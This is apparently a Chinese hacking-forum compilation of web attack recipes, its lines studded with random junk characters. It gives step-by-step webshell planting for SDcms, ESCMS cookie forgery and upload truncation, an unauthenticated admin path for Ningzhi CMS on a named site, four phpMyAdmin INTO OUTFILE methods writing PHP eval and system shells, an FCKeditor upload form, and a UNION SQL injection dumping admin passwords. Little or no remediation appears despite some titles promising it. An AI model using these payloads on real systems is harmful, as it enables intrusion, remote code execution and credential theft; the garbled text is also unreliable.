<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">5 c' ^9 `! N7 `
Upload a new file:<br>9 e* z# m0 d- s
<input type="file" name="NewFile" size="50"><br>
* ~) f5 T$ l7 F6 O<input id="btnUpload" type="submit" value="Upload">
: @& M/ S$ O6 }8 J( J4 k</form>
+ X, [6 z$ H2 \* V/ W4 j) M% W-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& L" v6 Y) m, E0 @; M+ C( Z' P K3 w( Z6 e; b# d2 R
SDcms 后台拿webshell
% k- D1 D' M$ w$ F5 H" H7 N' d( I. Z6 v9 N
4 D0 r; z! m x* V第一种方法:# B& ^% l* f8 I Q
进入后台-->系统管理-->系统设置-->系统设置->网站名称;" Y$ ~8 o0 x6 v. C5 n/ }
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx* I/ J$ J( y z. x. ]
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
- b, a* X$ _3 E4 j" E# v第二种方法:8 }3 U& Z. u, ?6 B
进入后台-->系统管理-->系统设置-->系统设置->上传设置; y) Q) K4 N+ ]' d/ c
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!8 e* O' S9 Y0 P' u2 H6 P
第三种方法:5 f+ J$ u) c! e; y$ T* {
进入后台-->界面管理-->模板文件管理-->创建文件! B6 i2 o; l9 g! r
文件名写入getshell.ashx, D" |3 S, h% J+ r
内容写入下面内容:$ ^# p |6 V9 ~8 }0 W* g& A
/====================复制下面的=========================/$ E9 |" H, u a; y+ u8 X
<%@ WebHandler Language="C#" Class="Handler" %>. M9 q) C Z- s
using System;- P) b9 M. L' }! y
using System.Web;
9 y) a1 j( o: m% x4 ]+ Cusing System.IO;
. S9 ~3 y. s4 W0 N2 Zpublic class Handler : IHttpHandler {7 V! ~! L7 X( B6 _
public void ProcessRequest (HttpContext context) {
2 u3 `/ C8 H+ u) Gcontext.Response.ContentType = "text/plain";; m# G4 b3 f6 ~/ @" l6 L
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
+ V2 ~) K$ z6 i7 yfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");/ k2 o* t) n8 b$ T
file1.Flush();1 Z C5 k g8 [! \/ n
file1.Close();
, r) e: W* _6 ?6 D}8 ?% c/ U* ]$ X- o% [# W
public bool IsReusable {
i0 E% k% g7 ]- Tget {
( d. [# j8 @9 y1 l* Z- ireturn false;+ d# o) s$ E4 \& ] `; o9 [
}
3 `* `! P8 g" X/ k. i9 V}
0 m. q% U4 j' Z7 F+ m: R9 P3 q}
& }. \1 L0 M: M& Y/=============================================/! l: x: k* g0 C) W' w4 @
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
; Z' U8 v5 S% \ x# h会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接0 ?% f0 t n5 U- N
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 J1 M2 j4 Q3 U; I9 r% L
+ h0 e3 E* {: d, N3 ~9 LESCMS网站管理系统0day
$ l& Y# i: h* ?: V x# `5 w* J w" Q' \
后台登陆验证是通过admin/check.asp实现的
9 v0 v1 H) |$ |. [$ q! [
O& Z" N8 [( I4 J p3 s6 _首先我们打开http://target.com/admin/es_index.html) x0 I. m3 H( y3 r3 L
然后在COOKIE结尾加上
% F* K' Z$ V) i V/ x; ESCMS$_SP2=ES_admin=st0p;
# b- z" U) z9 g! y& j% F修改,然后刷新; C- B+ U+ F2 u
进后台了嘎..5 Q* T$ s7 e1 E; D. g
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
: N+ T- S7 y1 d8 Z
: n5 f+ S: I; w$ S5 s利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
) b2 S! Z) m2 i( v嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
; O2 P% R' L' _" j4 K/ [2 l存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
3 d" L, P# d" [' j. d在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
% b/ K2 o4 m6 O( |% z; Q0 W# F------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: ]* H4 Z0 E# R ~9 H( d) R8 L) p+ j: E; G. r t; J( R
宁志网站管理系统后台无验证漏洞及修复
. X- p! Q3 z, h( Y) L
0 m- F+ u7 i" H4 t. F' c5 i网上搜了一下,好像没有发布.如有雷同纯粹巧合!
6 T8 X4 O; V3 h5 b# f官方网站:www.ningzhi.net
2 M5 y' t, d# e. c0 h学校网站管理系统 V.2011版本
! C6 g6 I% s& x9 W: k- q* d1 B2 Ghttp://down.chinaz.com/soft/29943.htm " b0 d9 `1 w* y+ Y' E
其它版本(如:政府版等),自行下载.- v+ `% p+ X D+ `* a0 ]( C
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
& m' Z2 Q8 w! v3 R; Slogin.asp代码如下:
2 g8 y' F; I7 w ]4 V<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
+ r% Z8 P" n! {% S* dmanage.asp代码我就不帖出来了.反正也没验证.
# B/ P& V! z+ _6 z# u, V只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!2 s. k8 |: J, ]1 i5 b( K y& }& \$ ^9 f
漏洞利用:
* [; p0 p! D- Y' k/ ]% `: i: K直接访问http://www.0855.tv/admin/manage.asp
9 ?. a0 F, w* B/ O& ^数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5( u/ q0 f2 D- Z' q& s
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 G- z$ P( T. B4 Y' x; [3 c$ o9 `/ Z/ P" Z7 h6 b% {8 V
phpmyadmin拿shell的四种方法总结及修复$ [% l5 {! X% L2 C1 g M6 }9 s
1 ` u1 v/ N5 l" U2 H+ P, y0 f方法一:$ H& g1 ]' T6 @# v$ J9 e3 r/ l/ @7 H
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
* B7 ~& \/ R$ l9 U8 X9 ~, t. T& R) BINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
$ ?: ^* b7 }3 K6 d! H; jSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';3 ~, h9 r' G+ ~4 ?& m& [$ u5 W
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php3 U* g. }, c- R
一句话连接密码:7on
0 j5 g$ |& b. I8 y: d3 t' q方法二:
% f+ w% U2 R$ m+ j C读取文件内容: select load_file('E:/xamp/www/s.php');* {: Q% r) z* |( Y& V2 z$ s- |! r
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
! w/ v/ w( k; J& U3 S& c" r2 Kcmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'. G' [! S7 W, Q* o( y
方法三:
. N* f/ ^( p8 K7 B9 TJhackJ版本 PHPmyadmin拿shell
( f8 b8 J9 v1 L A! u& F1 GCreate TABLE study (cmd text NOT NULL);( }% P8 L z n* A
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>'); c8 E3 C4 P/ C' j
select cmd from study into outfile 'E:/wamp/www/7.php';3 }3 j, b7 S. X9 p
Drop TABLE IF EXISTS study;
& |, _5 X* d- V$ ?+ J<?php eval($_POST[cmd])?>. Q( t$ t4 c' c
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
8 w4 N! [" S6 N# s5 pINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1! f) M- X" z+ C1 d5 |
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
, G. K' k8 c( ~1 e5 P) X6 yDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。* o- B: \$ U( @- C
方法四:, b, X. B- U- @ A% N
select load_file('E:/xamp/www/study.php');( M7 T5 |5 X) Y8 }) {9 {1 C2 T
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
) r' m/ m/ A! y( F9 i3 N- q然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
/ p, d$ n; w7 Y0 o% Y& r-----------------------------------------------------------------------------------------------------------------------------------------------------------------------' t& E6 K! l; L
& t( h2 W* [$ }) ^$ V
NO.001中学网站管理系统 Build 110628 注入漏洞
+ Y1 ?0 T+ Y( J$ W2 b( ^; h
h j1 D. m. q# H% Z% LNO.001中学网站管理系统功能模块:
* p2 b7 K |) f% b0 W1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
& P) w, |$ B- ^ l: H6 P. T& |1 M2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
- E7 V. C2 W6 _+ e0 ]3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息5 h1 x$ s! d$ i+ Q
4.视频图片管理:一级分类,动态添加视频或者图片等信息
* `% _; P5 T- @4 y7 w3 `5.留言管理:对留言,修改,删除、回复等管理
c# B4 D; d! G8 G; Y E0 j& `6.校友频道:包括校友资料excel导出、管理等功能
* ] a& `- \$ h2 X9 I8 ^( o7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页- M3 P8 l5 I5 D8 F) _
默认后台:admin/login.asp6 o% ?1 R, F" q+ D/ w6 Y1 a
官方演示:http://demo.001cms.net
! g( r4 q# t' l/ L+ l源码下载地址:http://down.chinaz.com/soft/30187.htm
. _% s' z; a- V; Z qEXP:
. e5 s/ g* N |6 |union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
! o! o6 g/ X- j测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin$ k+ f y+ T4 \' f
getshell:后台有备份,你懂的
7 Z2 o$ a9 J+ V- i/ \& |另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
& l# t ^" X% ^) |# r; q- l+ l1 g9 c------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |